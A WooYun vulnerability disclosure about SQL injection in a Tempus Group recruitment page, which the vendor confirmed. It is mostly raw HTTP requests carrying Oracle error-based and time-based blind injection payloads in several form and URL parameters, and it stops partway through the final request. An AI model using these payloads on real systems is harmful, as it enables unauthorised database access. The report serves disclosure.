当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117801

漏洞标题:腾邦国际某站多处SQL注入大量数据库DBA权限2

相关厂商:腾邦集团

漏洞作者: 路人甲

提交时间:2015-06-03 09:11

修复时间:2015-07-20 14:22

公开时间:2015-07-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

233

详细说明:

POST /pw/job2/UI/resume_trace.aspx?type=3 HTTP/1.1
Host: group.tempus.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://group.tempus.cn/pw/job2/UI/resume_trace.aspx?type=3
Cookie: ASPSESSIONIDSABBCSTQ=MKFNNNFCJAEFGAEMEGDCHGCB; cck_lasttime=1433235989419; cck_count=0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------643024530396
Content-Length: 2216
-----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1¤3ìê|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
ìá???úèY
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--

漏洞证明:

requests:
---
Parameter: MULTIPART details ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'uqLE' FROM DUAL WHERE 4248=4248 AND 2975=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2975=2975) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'oAQB' FROM DUAL WHERE 9489=9489 AND 5017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(72)||CHR(79)||CHR(108),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: type (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: type=3'||(SELECT 'pVJN' FROM DUAL WHERE 5132=5132 AND 8870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8870=8870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: type=3'||(SELECT 'MWEP' FROM DUAL WHERE 8072=8072 AND 6755=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(77)||CHR(80)||CHR(121),5))||'
Parameter: MULTIPART names ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'vYVe' FROM DUAL WHERE 1452=1452 AND 9762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9762=9762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'ekop' FROM DUAL WHERE 6976=6976 AND 4438=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(76)||CHR(68)||CHR(119),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone1 ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'dmzn' FROM DUAL WHERE 8179=8179 AND 3342=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3342=3342) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'kbgB' FROM DUAL WHERE 8921=8921 AND 9828=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(113)||CHR(113)||CHR(84),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'NHOb' FROM DUAL WHERE 2799=2799 AND 5308=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5308=5308) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'Qppd' FROM DUAL WHERE 6183=6183 AND 6041=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(81)||CHR(82)||CHR(65),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
